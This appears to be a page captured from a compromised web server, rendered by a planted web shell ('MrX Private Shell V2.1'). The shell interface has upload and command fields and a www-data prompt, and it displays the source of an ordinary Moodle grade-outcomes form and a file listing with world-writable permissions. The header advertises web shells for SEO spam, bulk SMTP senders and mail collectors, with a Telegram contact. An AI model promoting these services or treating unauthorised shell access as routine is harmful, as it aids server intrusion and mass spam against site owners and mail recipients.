__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php $maxlength=70; ?>

<form action="course.php" method="post">
<div>
<table class="courseoutcomes">
    <tr>
        <td>
            <label for="removeoutcomes"><?php print_string('outcomescourse', 'grades'); ?></label>
            <br />
            <select id="removeoutcomes" size="20" name="removeoutcomes[]" multiple="multiple" class="form-control input-block-level">
            <?php
            if ($co_standard_notused) {
                echo '<optgroup label="'.get_string('outcomescoursenotused', 'grades').'">';
                foreach ($co_standard_notused as $outcome) {
                    echo '<option value="'.$outcome->id.'">'.shorten_text($outcome->get_name(), $maxlength).'</option>';
                }
                echo '</optgroup>';
            }
            if ($co_standard_used) {
                echo '<optgroup label="'.get_string('outcomescourseused', 'grades').'">';
                foreach ($co_standard_used as $outcome) {
                    echo '<option value="'.$outcome->id.'">'.shorten_text($outcome->get_name(), $maxlength).'</option>';
                }
                echo '</optgroup>';
            }
            if ($co_custom) {
                echo '<optgroup label="'.get_string('outcomescoursecustom', 'grades').'">';
                foreach ($co_custom as $outcome) {
                    echo '<option value="'.$outcome->id.'">'.shorten_text($outcome->get_name(), $maxlength).'</option>';
                }
                echo '</optgroup>';
            }
            ?>
            </select>
        </td>
        <?php
        if (has_capability('moodle/grade:manageoutcomes', $context)) {
        ?>
        <td class="ps-3 pe-3">
            <div class="my-3">
                <input name="add" class="btn btn-secondary" id="add" type="submit" value="<?php echo $OUTPUT->larrow() . ' ' .
                    get_string('add'); ?>" title="<?php print_string('add'); ?>" />
            </div>
            <div class="my-3">
                <input name="remove" class="btn btn-secondary" id="remove" type="submit" value="<?php echo get_string('remove') .
                    ' ' . $OUTPUT->rarrow(); ?>" title="<?php print_string('remove'); ?>" />
            </div>
        </td>
        <?php } ?>
        <td>
            <label for="addoutcomes"><?php print_string('outcomesstandardavailable', 'grades'); ?></label>
            <br />
            <select id="addoutcomes" size="20" name="addoutcomes[]" multiple="multiple" class="form-control input-block-level">

            <?php
            foreach ($standardoutcomes as $outcome) {
                echo '<option value="'.$outcome->id.'">'.shorten_text($outcome->get_name(), $maxlength).'</option>';
            }
            ?>
            </select>
        </td>
    </tr>
</table>
<input name="id" type="hidden" value="<?php echo $courseid?>"/>
<input type="hidden" name="sesskey" value="<?php echo sesskey() ?>" />
</div>
</form>

Filemanager

Name Type Size Permission Actions
course.php File 4.99 KB 0777
course_form.html File 2.88 KB 0777
edit.php File 6.2 KB 0777
edit_form.php File 5.53 KB 0777
export.php File 4.16 KB 0777
import.php File 10.25 KB 0777
import_outcomes_form.php File 2.32 KB 0777
index.php File 9.46 KB 0777
tabs.php File 1.53 KB 0777
Filemanager